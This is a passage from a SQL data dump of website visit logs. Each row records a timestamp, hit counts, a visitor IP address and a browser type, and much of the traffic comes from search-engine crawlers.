(454327,1570609216,1,1,0,0,'66.249.64.69','chrome'),(454328,1570609518,1,1,0,0,'66.249.64.16','chrome'),(454329,1570610396,1,1,0,0,'141.8.142.164','other'),(454330,1570610441,1,1,0,0,'77.74.177.113','chrome'),(454331,1570610475,1,1,0,0,'37.54.20.14','chrome'),(454332,1570610697,1,1,0,0,'66.249.64.94','chrome'),(454333,1570611089,1,1,0,0,'141.8.183.18','other'),(454334,1570611591,1,1,0,0,'66.249.64.66','chrome'),(454335,1570611662,1,1,0,0,'66.249.64.69','chrome'),(454336,1570611678,2,2,0,0,'8.29.198.27','other'),(454337,1570611968,1,1,0,0,'207.46.13.208','other'),(454338,1570612227,1,1,0,0,'77.74.177.113','chrome'),(454339,1570612575,1,1,0,0,'157.55.39.82','other'),(454340,1570612780,2,2,0,0,'66.249.64.66','chrome'),(454341,1570612831,1,1,0,0,'157.55.39.104','other'),(454342,1570612929,1,1,0,0,'5.45.207.43','other'),(454343,1570613399,3,3,0,0,'66.249.64.94','chrome'),(454344,1570613740,1,1,0,0,'213.109.234.127','chrome'),(454345,1570613805,1,1,0,0,'31.13.115.24','chrome'),(454346,1570614021,1,1,0,0,'93.159.230.28','chrome'),(454347,1570614507,1,1,0,0,'66.249.64.69','chrome'),(454348,1570615073,1,1,0,0,'13.66.139.0','other'),(454349,1570615212,1,1,0,0,'31.129.232.45','chrome'),(454350,1570615795,1,1,0,0,'141.8.142.161','other'),(454351,1570615829,1,1,0,0,'77.74.177.113','chrome'),(454352,1570616212,1,1,0,0,'95.108.213.3','other'),(454353,1570616366,1,1,0,0,'46.96.42.73','chrome'),(454354,1570616528,1,1,0,0,'66.249.64.16','chrome'),(454355,1570616574,1,1,0,0,'188.165.218.34','firefox'),(454356,1570616642,2,2,0,0,'66.249.64.94','chrome'),(454357,1570617159,1,1,0,0,'207.46.13.38','other'),(454358,1570617393,1,1,0,0,'46.96.42.73','chrome'),(454359,1570617418,2,2,0,0,'207.46.13.218','other'),(454360,1570617457,1,1,0,0,'157.55.39.128','other'),(454361,1570617576,1,1,0,0,'93.159.230.28','chrome'),(454362,1570617758,2,2,0,0,'207.46.13.160','other'),(454363,1570617900,2,2,0,0,'95.213.141.126','opera'),(454364,1570618342,1,1,0,0,'207.46.13.208','other'),(454365,1570618360,1,1,0,0,'141.8.142.161','other'),(454366,1570618804,3,3,0,0,'66.249.64.94','chrome'),(454367,1570619088,1,1,0,0,'141.8.142.128','other'),(454368,1570619369,1,1,0,0,'93.159.230.28','chrome'),(454369,1570619565,1,1,0,0,'37.53.89.92','chrome'),(454370,1570619796,1,1,0,0,'134.119.234.55','other'),(454371,1570619797,1,1,0,0,'134.119.234.55','firefox'),(454372,1570620146,1,1,0,0,'207.46.13.38','other'),(454373,1570620151,2,2,0,0,'207.46.13.218','other'),(454374,1570620157,2,2,0,0,'157.55.39.104','other'),(454375,1570620436,3,3,0,0,'66.249.64.94','chrome'),(454376,1570620629,1,1,0,0,'66.249.64.69','chrome'),(454377,1570621001,1,1,0,0,'95.152.62.128','chrome'),(454378,1570621190,1,1,0,0,'77.74.177.113','chrome'),(454379,1570621669,1,1,0,0,'37.53.89.92','chrome'),(454380,1570621910,1,1,0,0,'157.55.39.104','other'),(454381,1570622329,1,1,0,0,'207.46.13.38','other'),(454382,1570622544,2,2,0,0,'8.29.198.26','other'),(454383,1570622740,1,1,0,0,'66.249.64.94','chrome'),(454384,1570622841,1,1,0,0,'66.249.64.16','chrome'),(454385,1570622862,1,1,0,0,'66.249.64.69','chrome'),(454386,1570622976,1,1,0,0,'93.159.230.28','chrome'),(454387,1570624605,1,1,0,0,'91.196.178.84','chrome'),(454388,1570624615,1,1,0,0,'77.74.177.114','chrome'),(454389,1570624870,1,1,0,0,'46.133.224.31','chrome'),(454390,1570624950,1,1,0,0,'137.226.113.28','other'),(454391,1570625155,1,1,0,0,'157.55.39.104','other'),(454392,1570625442,1,1,0,0,'66.249.64.18','chrome'),(454393,1570625715,1,1,0,0,'66.249.64.66','chrome'),(454394,1570626132,1,1,0,0,'37.52.160.166','chrome'),(454395,1570626163,1,1,0,0,'77.74.177.113','chrome'),(454396,1570626522,1,1,0,0,'37.9.113.202','other'),(454397,1570627279,4,4,0,0,'66.249.64.69','chrome'),(454398,1570627350,1,1,0,0,'66.249.64.94','chrome'),(454399,1570627442,2,2,0,0,'66.249.64.66','chrome'),(454400,1570627780,1,1,0,0,'77.74.177.113','chrome'),(454401,1570628265,1,1,0,0,'66.249.64.94','chrome'),(454402,1570628318,1,1,0,0,'198.108.66.80','other'),(454403,1570628386,1,1,0,0,'188.165.218.34','firefox'),(454404,1570629237,1,1,0,0,'91.196.178.71','firefox'),(454405,1570629324,1,1,0,0,'93.159.230.28','chrome'),(454406,1570629331,2,2,0,0,'66.249.64.66','chrome'),(454407,1570629433,1,1,0,0,'66.249.64.18','chrome'),(454408,1570629453,1,1,0,0,'66.249.64.94','chrome'),(454409,1570630031,2,2,0,0,'207.46.13.176','other'),(454410,1570630529,1,1,0,0,'66.249.64.18','chrome'),(454411,1570630607,1,1,0,0,'109.74.154.72','chrome'),(454412,1570630929,1,1,0,0,'77.74.177.114','chrome'),(454413,1570631170,1,1,0,0,'66.249.64.16','chrome'),(454414,1570632833,1,1,0,0,'77.74.177.113','chrome'),(454415,1570632877,1,1,0,0,'66.249.64.94','chrome'),(454416,1570633366,1,1,0,0,'95.108.181.104','other'),(454417,1570633410,2,2,0,0,'8.29.198.27','other'),(454418,1570634541,1,1,0,0,'77.74.177.113','chrome'),(454419,1570635747,1,1,0,0,'46.211.158.100','chrome'),(454420,1570635945,1,1,0,0,'91.196.178.87','firefox'),(454421,1570635947,1,1,0,0,'178.154.171.7','other'),(454422,1570636277,1,1,0,0,'77.74.177.114','chrome'),(454423,1570636605,1,1,0,0,'66.249.64.94','chrome'),(454424,1570637644,1,1,0,0,'185.183.96.122','other'),(454425,1570637989,1,1,0,0,'157.55.39.67','other'),(454426,1570638099,1,1,0,0,'89.208.29.221','chrome'),(454427,1570638374,2,2,0,0,'66.249.64.69','chrome'),(454428,1570638431,1,1,0,0,'141.8.142.115','other'),(454429,1570638801,7,7,0,0,'66.249.64.16','chrome'),(454430,1570638803,1,1,0,0,'198.108.66.64','other'),(454431,1570638810,10,10,0,0,'66.249.64.66','chrome'),(454432,1570638841,33,33,0,0,'66.249.64.94','chrome'),(454433,1570638875,1,1,0,0,'91.196.178.67','chrome'),(454434,1570638983,1,1,0,0,'66.249.64.18','chrome'),(454435,1570639371,1,1,0,0,'5.255.253.8','other'),(454436,1570639648,1,1,0,0,'188.165.218.34','firefox'),(454437,1570639684,2,2,0,0,'66.249.64.69','chrome'),(454438,1570639715,1,1,0,0,'78.111.187.205','other'),(454439,1570639786,9,9,0,0,'66.249.64.66','chrome'),(454440,1570639805,42,42,0,0,'66.249.64.94','chrome'),(454441,1570639812,1,1,0,0,'77.74.177.113','chrome'),(454442,1570639968,6,6,0,0,'66.249.64.16','chrome'),(454443,1570640283,2,2,0,0,'66.249.64.18','chrome'),(454444,1570640720,16,16,0,0,'66.249.64.94','chrome'),(454445,1570640761,3,3,0,0,'66.249.64.69','chrome'),(454446,1570640781,8,8,0,0,'66.249.64.66','chrome'),(454447,1570641270,1,1,0,0,'141.8.142.128','other'),(454448,1570641392,1,1,0,0,'157.55.39.67','other'),(454449,1570641624,22,22,0,0,'66.249.64.94','chrome'),(454450,1570641665,2,2,0,0,'66.249.64.18','chrome'),(454451,1570641747,5,5,0,0,'66.249.64.66','chrome'),(454452,1570641858,4,4,0,0,'66.249.64.16','chrome'),(454453,1570642082,5,5,0,0,'66.249.64.69','chrome'),(454454,1570642528,16,16,0,0,'66.249.64.94','chrome'),(454455,1570642793,6,6,0,0,'66.249.64.66','chrome'),(454456,1570642842,1,1,0,0,'157.55.39.67','other'),(454457,1570643016,2,2,0,0,'66.249.64.16','chrome'),(454458,1570643452,9,9,0,0,'66.249.64.94','chrome'),(454459,1570643738,3,3,0,0,'66.249.64.69','chrome'),(454460,1570643951,2,2,0,0,'66.249.64.18','chrome'),(454461,1570644093,5,5,0,0,'66.249.64.16','chrome'),(454462,1570644279,1,1,0,0,'8.29.198.27','other'),(454463,1570644309,7,7,0,0,'66.249.64.66','chrome'),(454464,1570644348,1,1,0,0,'8.29.198.26','other'),(454465,1570644357,25,25,0,0,'66.249.64.94','chrome'),(454466,1570644845,3,3,0,0,'66.249.64.69','chrome'),(454467,1570644865,3,3,0,0,'66.249.64.18','chrome'),(454468,1570645099,5,5,0,0,'66.249.64.16','chrome'),(454469,1570645302,12,12,0,0,'66.249.64.66','chrome'),(454470,1570645307,1,1,0,0,'141.8.188.39','chrome'),(454471,1570645312,22,22,0,0,'66.249.64.94','chrome'),(454472,1570645749,1,1,0,0,'66.249.64.69','chrome'),(454473,1570645850,1,1,0,0,'207.46.13.4','other'),(454474,1570646227,2,2,0,0,'66.249.64.66','chrome'),(454475,1570646237,1,1,0,0,'66.249.64.16','chrome'),(454476,1570646267,2,2,0,0,'66.249.64.94','chrome'),(454477,1570646413,1,1,0,0,'157.55.39.207','other'),(454478,1570646999,4,4,0,0,'66.249.64.69','chrome'),(454479,1570647111,3,3,0,0,'66.249.64.18','chrome'),(454480,1570647273,8,8,0,0,'66.249.64.16','chrome'),(454481,1570647324,11,11,0,0,'66.249.64.94','chrome'),(454482,1570647497,9,9,0,0,'66.249.64.66','chrome'),(454483,1570647652,2,2,0,0,'157.55.39.67','other'),(454484,1570647704,1,1,0,0,'207.46.13.227','other'),(454485,1570647990,1,1,0,0,'136.243.129.166','other'),(454486,1570648157,4,4,0,0,'66.249.64.69','chrome'),(454487,1570648249,1,1,0,0,'66.249.64.18','chrome'),(454488,1570648362,1,1,0,0,'66.249.64.16','chrome'),(454489,1570648391,20,20,0,0,'66.249.64.94','chrome'),(454490,1570648462,7,7,0,0,'66.249.64.66','chrome'),(454491,1570649192,1,1,0,0,'45.136.108.44','firefox'),(454492,1570649204,1,1,0,0,'54.39.100.61','other'),(454493,1570649979,1,1,0,0,'141.8.132.19','chrome'),(454494,1570649996,2,2,0,0,'66.249.64.94','chrome'),(454495,1570650128,1,1,0,0,'66.249.64.66','chrome'),(454496,1570650949,1,1,0,0,'188.165.218.34','firefox'),(454497,1570651033,1,1,0,0,'207.46.13.235','other'),(454498,1570651464,1,1,0,0,'207.46.13.1','other'),(454499,1570652841,1,1,0,0,'66.249.64.66','chrome'),(454500,1570652877,1,1,0,0,'157.55.39.148','other'),(454501,1570652940,1,1,0,0,'178.22.65.97','chrome'),(454502,1570654694,1,1,0,0,'87.250.224.118','other'),(454503,1570654781,1,1,0,0,'66.249.64.94','chrome'),(454504,1570655065,1,1,0,0,'66.249.64.69','chrome'),(454505,1570655145,1,1,0,0,'8.29.198.26','other'),(454506,1570655190,1,1,0,0,'8.29.198.27','other'),(454507,1570655310,1,1,0,0,'66.249.64.18','chrome'),(454508,1570656138,1,1,0,0,'95.108.213.3','other'),(454509,1570656296,3,3,0,0,'66.249.64.66','chrome'),(454510,1570656438,2,2,0,0,'66.249.64.69','chrome'),(454511,1570656448,1,1,0,0,'66.249.64.18','chrome'),(454512,1570656519,1,1,0,0,'66.249.64.94','chrome'),(454513,1570658114,2,2,0,0,'66.249.64.94','chrome'),(454514,1570658284,1,1,0,0,'207.46.13.207','other'),(454515,1570658480,2,2,0,0,'66.249.64.69','chrome'),(454516,1570659503,33,33,0,0,'66.249.64.94','chrome'),(454517,1570659563,13,13,0,0,'66.249.64.66','chrome'),(454518,1570659567,7,7,0,0,'66.249.64.69','chrome'),(454519,1570659569,1,1,0,0,'37.9.113.200','other'),(454520,1570660336,1,1,0,0,'37.9.113.142','other'),(454521,1570662556,1,1,0,0,'5.45.207.49','other'),(454522,1570662722,1,1,0,0,'188.165.218.34','firefox'),(454523,1570663441,1,1,0,0,'35.172.223.215','other'),(454524,1570664149,2,2,0,0,'66.249.64.18','chrome'),(454525,1570664403,4,4,0,0,'66.249.64.94','chrome'),(454526,1570664576,1,1,0,0,'66.249.64.66','chrome'),(454527,1570664823,2,2,0,0,'66.249.64.69','chrome'),(454528,1570664982,5,5,0,0,'66.249.64.16','chrome'),(454529,1570665314,1,1,0,0,'62.205.134.182','other'),(454530,1570665429,2,2,0,0,'66.249.64.18','chrome'),(454531,1570665805,2,2,0,0,'66.249.64.94','chrome'),(454532,1570666005,1,1,0,0,'8.29.198.25','other'),(454533,1570666039,1,1,0,0,'66.249.64.69','chrome'),(454534,1570666046,1,1,0,0,'8.29.198.26','other'),(454535,1570666130,3,3,0,0,'66.249.64.16','chrome'),(454536,1570666496,2,2,0,0,'66.249.64.18','chrome'),(454537,1570666740,5,5,0,0,'66.249.64.94','chrome'),(454538,1570666984,8,8,0,0,'66.249.64.66','chrome'),(454539,1570667227,3,3,0,0,'66.249.64.16','chrome'),(454540,1570667238,2,2,0,0,'66.249.64.69','chrome'),(454541,1570667685,8,8,0,0,'66.249.64.94','chrome'),(454542,1570667888,4,4,0,0,'66.249.64.66','chrome'),(454543,1570667907,1,1,0,0,'85.10.202.243','chrome'),(454544,1570668802,3,3,0,0,'66.249.64.66','chrome'),(454545,1570669027,1,1,0,0,'157.55.39.180','other'),(454546,1570669029,1,1,0,0,'157.55.39.132','other'),(454547,1570669330,1,1,0,0,'66.249.64.16','chrome'),(454548,1570669503,2,2,0,0,'66.249.64.18','chrome'),(454549,1570669778,1,1,0,0,'66.249.64.94','chrome'),(454550,1570670458,1,1,0,0,'66.249.64.16','chrome'),(454551,1570670969,1,1,0,0,'37.9.113.202','other'),(454552,1570671339,1,1,0,0,'46.4.33.48','other'),(454553,1570671546,1,1,0,0,'66.249.64.16','chrome'),(454554,1570671647,1,1,0,0,'66.249.64.69','chrome'),(454555,1570673296,2,2,0,0,'157.55.39.132','other'),(454556,1570673659,1,1,0,0,'66.249.64.18','chrome'),(454557,1570674787,8,8,0,0,'66.249.64.94','chrome'),(454558,1570674878,3,3,0,0,'66.249.64.16','chrome'),(454559,1570674990,6,6,0,0,'66.249.64.66','chrome'),(454560,1570675091,4,4,0,0,'66.249.64.69','chrome'),(454561,1570676026,2,2,0,0,'66.249.64.16','chrome'),(454562,1570676097,7,7,0,0,'66.249.64.94','chrome'),(454563,1570676351,5,5,0,0,'66.249.64.66','chrome'),(454564,1570676778,1,1,0,0,'128.90.160.64','chrome'),(454565,1570676860,2,2,0,0,'8.29.198.27','other'),(454566,1570677011,2,2,0,0,'66.249.64.69','chrome'),(454567,1570677021,6,6,0,0,'66.249.64.94','chrome'),(454568,1570677194,2,2,0,0,'66.249.64.18','chrome'),(454569,1570677255,1,1,0,0,'95.108.213.3','other'),(454570,1570677306,2,2,0,0,'66.249.64.66','chrome'),(454571,1570677779,2,2,0,0,'66.249.64.16','chrome'),(454572,1570678343,6,6,0,0,'66.249.64.94','chrome'),(454573,1570678485,3,3,0,0,'66.249.64.66','chrome'),(454574,1570678627,1,1,0,0,'66.249.64.69','chrome'),(454575,1570679429,8,8,0,0,'66.249.64.66','chrome'),(454576,1570679531,2,2,0,0,'66.249.64.18','chrome'),(454577,1570679724,15,15,0,0,'66.249.64.94','chrome'),(454578,1570679816,3,3,0,0,'66.249.64.69','chrome'),(454579,1570680181,2,2,0,0,'66.249.64.16','chrome'),(454580,1570680334,1,1,0,0,'66.249.64.66','chrome'),(454581,1570681391,1,1,0,0,'66.249.64.69','chrome'),(454582,1570681512,3,3,0,0,'66.249.64.94','chrome'),(454583,1570681522,1,1,0,0,'66.249.64.66','chrome'),(454584,1570681553,1,1,0,0,'66.249.64.18','chrome'),(454585,1570682545,1,1,0,0,'157.55.39.180','other'),(454586,1570682549,1,1,0,0,'116.202.84.41','other'),(454587,1570682857,1,1,0,0,'62.205.134.182','other'),(454588,1570683046,1,1,0,0,'37.9.113.202','other'),(454589,1570683179,1,1,0,0,'66.249.64.66','chrome'),(454590,1570684560,1,1,0,0,'66.249.64.18','chrome'),(454591,1570686862,1,1,0,0,'37.9.113.177','other'),(454592,1570687048,2,2,0,0,'66.249.64.94','chrome'),(454593,1570687244,1,1,0,0,'13.66.139.0','other'),(454594,1570687365,1,1,0,0,'178.133.158.77','chrome'),(454595,1570687708,1,1,0,0,'66.249.64.16','chrome'),(454596,1570687712,1,1,0,0,'8.29.198.27','other'),(454597,1570687739,1,1,0,0,'8.29.198.26','other'),(454598,1570687813,1,1,0,0,'37.9.113.177','other'),(454599,1570688525,1,1,0,0,'157.55.39.72','other'),(454600,1570688815,1,1,0,0,'66.249.64.94','chrome'),(454601,1570688936,1,1,0,0,'91.196.178.84','chrome'),(454602,1570689709,1,1,0,0,'66.249.64.66','chrome'),(454603,1570689807,1,1,0,0,'213.108.45.138','chrome'),(454604,1570689978,1,1,0,0,'91.196.178.92','firefox'),(454605,1570690337,1,1,0,0,'207.46.13.37','other'),(454606,1570691182,1,1,0,0,'66.249.64.66','chrome'),(454607,1570691550,1,1,0,0,'85.206.165.25','chrome'),(454608,1570692324,1,1,0,0,'207.46.13.59','other'),(454609,1570693413,1,1,0,0,'95.24.23.113','msie'),(454610,1570694941,1,1,0,0,'66.249.64.16','chrome'),(454611,1570695683,2,2,0,0,'66.249.64.69','chrome'),(454612,1570695785,2,2,0,0,'66.249.64.94','chrome'),(454613,1570696130,1,1,0,0,'66.249.64.66','chrome'),(454614,1570696392,1,1,0,0,'207.46.13.37','other'),(454615,1570696446,1,1,0,0,'207.46.13.59','other'),(454616,1570697492,1,1,0,0,'157.55.39.213','other'),(454617,1570697533,1,1,0,0,'141.8.188.66','other'),(454618,1570697593,1,1,0,0,'95.108.213.3','other'),(454619,1570697817,1,1,0,0,'66.249.64.94','chrome'),(454620,1570698142,1,1,0,0,'66.249.64.66','chrome'),(454621,1570698590,1,1,0,0,'8.29.198.27','other'),(454622,1570698607,1,1,0,0,'8.29.198.25','other'),(454623,1570699817,1,1,0,0,'157.55.39.73','other'),(454624,1570700122,1,1,0,0,'193.106.30.99','chrome'),(454625,1570700252,2,2,0,0,'157.55.39.52','other'),(454626,1570700296,3,3,0,0,'66.249.64.16','chrome'),(454627,1570700357,1,1,0,0,'66.249.64.18','chrome'),(454628,1570700408,1,1,0,0,'66.249.64.66','chrome'),(454629,1570700426,1,1,0,0,'91.196.178.183','chrome'),(454630,1570700468,3,3,0,0,'66.249.64.69','chrome'),(454631,1570700601,2,2,0,0,'66.249.64.94','chrome'),(454632,1570702409,1,1,0,0,'66.249.64.66','chrome'),(454633,1570702704,1,1,0,0,'66.249.64.69','chrome'),(454634,1570702827,1,1,0,0,'207.46.13.196','other'),(454635,1570704035,1,1,0,0,'66.249.64.94','chrome'),(454636,1570704106,3,3,0,0,'66.249.64.66','chrome'),(454637,1570704248,1,1,0,0,'157.55.39.213','other'),(454638,1570704555,1,1,0,0,'191.101.213.89','chrome'),(454639,1570704589,1,1,0,0,'178.133.228.246','chrome'),(454640,1570705057,1,1,0,0,'66.102.9.164','chrome'),(454641,1570705121,10,10,0,0,'66.249.64.94','chrome'),(454642,1570705132,2,2,0,0,'66.249.64.16','chrome'),(454643,1570705152,4,4,0,0,'66.249.64.66','chrome'),(454644,1570705264,2,2,0,0,'66.249.64.69','chrome'),(454645,1570706021,1,1,0,0,'157.55.39.213','other'),(454646,1570706361,2,2,0,0,'66.249.64.18','chrome'),(454647,1570706740,2,2,0,0,'157.55.39.52','other'),(454648,1570706744,2,2,0,0,'157.55.39.73','other'),(454649,1570706819,2,2,0,0,'66.249.64.69','chrome'),(454650,1570707253,1,1,0,0,'141.8.132.2','other'),(454651,1570708031,3,3,0,0,'66.249.64.94','chrome'),(454652,1570708238,1,1,0,0,'178.93.117.158','firefox'),(454653,1570708605,1,1,0,0,'91.196.178.84','chrome'),(454654,1570708610,2,2,0,0,'66.249.64.69','chrome'),(454655,1570709230,1,1,0,0,'66.249.64.94','chrome'),(454656,1570709440,2,2,0,0,'8.29.198.26','other'),(454657,1570709551,1,1,0,0,'157.55.39.52','other'),(454658,1570710252,1,1,0,0,'91.196.178.84','chrome'),(454659,1570710680,1,1,0,0,'141.8.188.12','other'),(454660,1570710713,2,0,2,0,'157.55.39.52',''),(454661,1570710815,1,1,0,0,'178.251.106.149','chrome'),(454662,1570711612,1,1,0,0,'141.8.132.12','other'),(454663,1570711621,1,1,0,0,'141.8.132.37','other'),(454664,1570711668,2,2,0,0,'66.249.64.94','chrome'),(454665,1570711749,1,1,0,0,'109.74.154.72','chrome'),(454666,1570711946,1,1,0,0,'212.90.60.9','firefox'),(454667,1570712833,1,1,0,0,'66.249.64.18','chrome'),(454668,1570712870,1,1,0,0,'66.249.64.69','chrome'),(454669,1570712879,1,1,0,0,'66.249.64.66','chrome'),(454670,1570712893,3,3,0,0,'66.249.64.94','chrome'),(454671,1570712903,2,2,0,0,'66.249.64.16','chrome'),(454672,1570713146,1,1,0,0,'91.196.178.73','firefox'),(454673,1570713211,1,1,0,0,'91.196.178.10','chrome'),(454674,1570713321,2,2,0,0,'91.196.178.84','chrome'),(454675,1570715281,1,0,1,0,'66.249.64.69',''),(454676,1570715296,2,2,0,0,'66.249.64.94','chrome'),(454677,1570715631,1,1,0,0,'91.196.178.84','chrome'),(454678,1570715718,1,1,0,0,'91.196.178.73','firefox'),(454679,1570715821,1,1,0,0,'157.55.39.52','other'),(454680,1570716446,1,1,0,0,'66.249.64.16','chrome'),(454681,1570717053,1,1,0,0,'66.249.64.94','chrome'),(454682,1570717055,2,2,0,0,'66.249.64.18','chrome'),(454683,1570718268,2,2,0,0,'66.249.64.66','chrome'),(454684,1570720328,1,1,0,0,'8.29.198.27','other'),(454685,1570720330,1,1,0,0,'8.29.198.25','other'),(454686,1570721634,1,1,0,0,'80.93.124.54','chrome'),(454687,1570721900,1,1,0,0,'66.249.64.69','chrome'),(454688,1570722435,1,1,0,0,'5.45.207.43','other'),(454689,1570724298,1,1,0,0,'66.249.64.94','chrome'),(454690,1570725175,1,1,0,0,'141.8.183.15','other'),(454691,1570726263,1,1,0,0,'207.46.13.63','other'),(454692,1570726655,1,1,0,0,'5.45.207.44','other'),(454693,1570727120,1,1,0,0,'66.249.64.69','chrome'),(454694,1570727340,1,1,0,0,'91.226.253.45','chrome'),(454695,1570727618,1,1,0,0,'92.113.156.60','chrome'),(454696,1570727644,1,1,0,0,'207.46.13.125','other'),(454697,1570728309,1,1,0,0,'66.249.64.94','chrome'),(454698,1570728952,1,1,0,0,'66.249.64.66','chrome'),(454699,1570730105,2,2,0,0,'66.249.64.18','chrome'),(454700,1570730197,2,2,0,0,'66.249.64.94','chrome'),(454701,1570730246,2,2,0,0,'66.249.64.66','chrome'),(454702,1570730372,1,1,0,0,'38.99.62.94','other'),(454703,1570731191,2,2,0,0,'8.29.198.27','other'),(454704,1570731509,1,1,0,0,'13.66.139.0','other'),(454705,1570732036,1,1,0,0,'46.211.159.46','chrome'),(454706,1570732255,1,1,0,0,'207.46.13.63','other'),(454707,1570733115,1,1,0,0,'66.249.64.69','chrome'),(454708,1570733634,2,0,2,0,'207.46.13.161',''),(454709,1570733730,1,1,0,0,'66.249.64.66','chrome'),(454710,1570733937,1,1,0,0,'91.196.178.17','chrome'),(454711,1570734405,1,1,0,0,'66.249.64.69','chrome'),(454712,1570734463,1,1,0,0,'157.55.39.228','other'),(454713,1570734873,1,1,0,0,'207.46.13.63','other'),(454714,1570734963,1,1,0,0,'66.249.64.16','chrome'),(454715,1570735336,2,2,0,0,'91.209.11.236','other'),(454716,1570735526,2,2,0,0,'66.249.64.69','chrome'),(454717,1570736704,2,2,0,0,'91.209.11.236','other'),(454718,1570736727,3,3,0,0,'66.249.64.69','chrome'),(454719,1570736808,1,1,0,0,'66.249.64.18','chrome'),(454720,1570737329,12,12,0,0,'66.249.64.94','chrome'),(454721,1570737371,3,3,0,0,'66.249.64.16','chrome'),(454722,1570737397,3,3,0,0,'66.249.64.66','chrome'),(454723,1570737677,2,2,0,0,'91.209.11.236','other'),(454724,1570737857,2,2,0,0,'207.46.13.161','other'),(454725,1570738037,1,1,0,0,'66.249.64.69','chrome'),(454726,1570738103,1,1,0,0,'95.108.213.3','other'),(454727,1570738538,1,1,0,0,'66.249.64.66','chrome'),(454728,1570738540,1,1,0,0,'66.249.64.94','chrome'),(454729,1570738607,1,1,0,0,'66.249.64.16','chrome'),(454730,1570739118,1,1,0,0,'66.249.64.18','chrome'),(454731,1570739676,1,1,0,0,'207.46.13.63','other'),(454732,1570740681,1,1,0,0,'95.108.213.39','other'),(454733,1570741202,1,1,0,0,'66.249.64.66','chrome'),(454734,1570741224,2,2,0,0,'66.249.64.94','chrome'),(454735,1570741522,1,1,0,0,'66.249.64.69','chrome'),(454736,1570742047,1,1,0,0,'8.29.198.27','other'),(454737,1570742051,1,1,0,0,'8.29.198.25','other'),(454738,1570742128,1,1,0,0,'66.249.64.18','chrome'),(454739,1570742446,1,1,0,0,'141.8.132.37','other'),(454740,1570742863,1,1,0,0,'157.55.39.228','other'),(454741,1570743323,2,2,0,0,'66.249.64.69','chrome'),(454742,1570743388,1,1,0,0,'95.108.213.39','other'),(454743,1570743802,1,1,0,0,'141.8.132.28','other'),(454744,1570744000,2,0,2,0,'157.55.39.228',''),(454745,1570745154,5,5,0,0,'66.249.64.66','chrome'),(454746,1570745202,1,1,0,0,'66.249.64.16','chrome'),(454747,1570745250,1,1,0,0,'66.249.64.94','chrome'),(454748,1570746335,6,6,0,0,'66.249.64.94','chrome'),(454749,1570746666,1,1,0,0,'66.249.64.69','chrome'),(454750,1570746694,1,1,0,0,'66.249.64.66','chrome'),(454751,1570747470,8,8,0,0,'66.249.64.94','chrome'),(454752,1570747542,1,1,0,0,'37.9.113.97','other'),(454753,1570747620,1,0,1,0,'66.249.64.69',''),(454754,1570747937,1,1,0,0,'66.249.64.18','chrome'),(454755,1570747994,1,1,0,0,'207.46.13.48','other'),(454756,1570748103,1,1,0,0,'66.249.64.66','chrome'),(454757,1570748673,8,8,0,0,'66.249.64.94','chrome'),(454758,1570748865,1,1,0,0,'207.46.13.6','other'),(454759,1570749871,8,8,0,0,'66.249.64.94','chrome'),(454760,1570750614,1,1,0,0,'66.249.64.69','chrome'),(454761,1570751070,7,7,0,0,'66.249.64.94','chrome'),(454762,1570751288,2,2,0,0,'207.46.13.6','other'),(454763,1570751713,1,1,0,0,'62.205.134.182','other'),(454764,1570751735,2,2,0,0,'66.249.64.69','chrome'),(454765,1570752278,8,8,0,0,'66.249.64.94','chrome'),(454766,1570752645,1,1,0,0,'157.55.39.67','other'),(454767,1570752896,1,1,0,0,'8.29.198.27','other'),(454768,1570752928,1,1,0,0,'8.29.198.25','other'),(454769,1570753007,1,1,0,0,'34.239.160.63','other'),(454770,1570753191,1,1,0,0,'37.9.113.202','other'),(454771,1570753240,1,1,0,0,'13.66.139.0','other'),(454772,1570753256,1,1,0,0,'5.45.207.44','other'),(454773,1570753472,9,9,0,0,'66.249.64.94','chrome'),(454774,1570754375,1,1,0,0,'65.154.226.109','msie'),(454775,1570754676,5,5,0,0,'66.249.64.94','chrome'),(454776,1570754965,3,3,0,0,'66.249.64.66','chrome'),(454777,1570755347,1,1,0,0,'66.249.64.69','chrome'),(454778,1570755878,6,6,0,0,'66.249.64.94','chrome'),(454779,1570755907,2,2,0,0,'66.249.64.66','chrome'),(454780,1570756090,1,1,0,0,'67.137.36.66','chrome'),(454781,1570757049,1,1,0,0,'207.46.13.6','other'),(454782,1570757082,9,9,0,0,'66.249.64.94','chrome'),(454783,1570757531,1,1,0,0,'37.9.113.200','other'),(454784,1570757575,1,1,0,0,'37.9.113.10','other'),(454785,1570758016,1,1,0,0,'69.164.111.198','other'),(454786,1570758367,5,5,0,0,'66.249.64.94','chrome'),(454787,1570758369,1,1,0,0,'66.249.64.69','chrome'),(454788,1570758371,3,3,0,0,'66.249.64.66','chrome'),(454789,1570758499,1,1,0,0,'95.108.213.39','other'),(454790,1570759313,1,1,0,0,'207.46.13.8','other'),(454791,1570759506,1,1,0,0,'66.249.64.69','chrome'),(454792,1570759507,3,3,0,0,'66.249.64.66','chrome'),(454793,1570759509,4,4,0,0,'66.249.64.94','chrome'),(454794,1570760664,2,0,2,0,'207.46.13.8',''),(454795,1570760682,8,8,0,0,'66.249.64.94','chrome'),(454796,1570760707,1,1,0,0,'66.249.64.66','chrome'),(454797,1570760885,2,2,0,0,'157.55.39.170','other'),(454798,1570761422,1,1,0,0,'91.196.178.83','chrome'),(454799,1570761850,1,1,0,0,'95.108.213.3','other'),(454800,1570761886,7,7,0,0,'66.249.64.94','chrome'),(454801,1570762504,1,1,0,0,'66.249.64.69','chrome'),(454802,1570762506,3,3,0,0,'66.249.64.66','chrome'),(454803,1570762749,2,2,0,0,'66.249.64.16','chrome'),(454804,1570762792,7,7,0,0,'66.249.64.94','chrome'),(454805,1570763251,1,1,0,0,'13.66.139.0','other'),(454806,1570763759,5,5,0,0,'66.249.64.94','chrome'),(454807,1570763762,2,2,0,0,'8.29.198.27','other'),(454808,1570764311,1,1,0,0,'207.46.13.175','other'),(454809,1570764882,6,6,0,0,'66.249.64.94','chrome'),(454810,1570765101,4,4,0,0,'66.249.64.69','chrome'),(454811,1570765227,2,2,0,0,'207.46.13.175','other'),(454812,1570765370,1,1,0,0,'157.55.39.170','other'),(454813,1570765811,2,2,0,0,'66.249.64.94','chrome'),(454814,1570765990,1,1,0,0,'66.249.64.66','chrome'),(454815,1570766127,7,7,0,0,'66.249.64.69','chrome'),(454816,1570767284,7,7,0,0,'66.249.64.94','chrome'),(454817,1570767312,1,1,0,0,'66.249.64.69','chrome'),(454818,1570768397,1,1,0,0,'95.216.96.245','other'),(454819,1570768493,7,7,0,0,'66.249.64.94','chrome'),(454820,1570768515,1,1,0,0,'66.249.64.69','chrome'),(454821,1570769088,1,1,0,0,'6